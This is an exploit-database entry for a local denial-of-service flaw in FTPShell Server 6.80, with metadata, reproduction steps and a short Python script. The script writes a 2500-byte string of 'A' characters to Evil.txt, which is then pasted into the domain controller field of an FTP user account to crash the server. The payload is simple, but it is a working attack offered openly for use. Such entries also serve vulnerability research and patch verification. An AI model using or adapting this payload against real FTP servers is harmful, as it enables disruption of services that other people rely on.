[] NeoSense

FTPShell Server 6.80 - Denial of Service

Author: Hashim Jawad
type: dos
platform: windows_x86
port: 
date_added: 2018-05-23 
date_updated: 2018-05-23 
verified: 0 
codes:  
tags: 
aliases:  
screenshot_url:  
application_url: 

# Exploit Title: FTPShell Server 6.80 - Local Denial of Service
# Exploit Author: Hashim Jawad
# Date: 2018-05-23
# Vendor Homepage: http://www.ftpshell.com/
# Vulnerable Software: http://www.ftpshell.com/downloadserver.htm
# Tested on: Windows 7 Enterprise - SP1 (x86)
# Steps to reproduce: under FTP user accounts paste contents of Evil.txt in domain controller field

#!/usr/bin/python

buffer = '\x41' * 2500

try:
	f=open("Evil.txt","w")
	print "[+] Creating %s bytes evil payload.." %len(buffer)
	f.write(buffer)
	f.close()
	print "[+] File created!"
except Exception as e:
	print e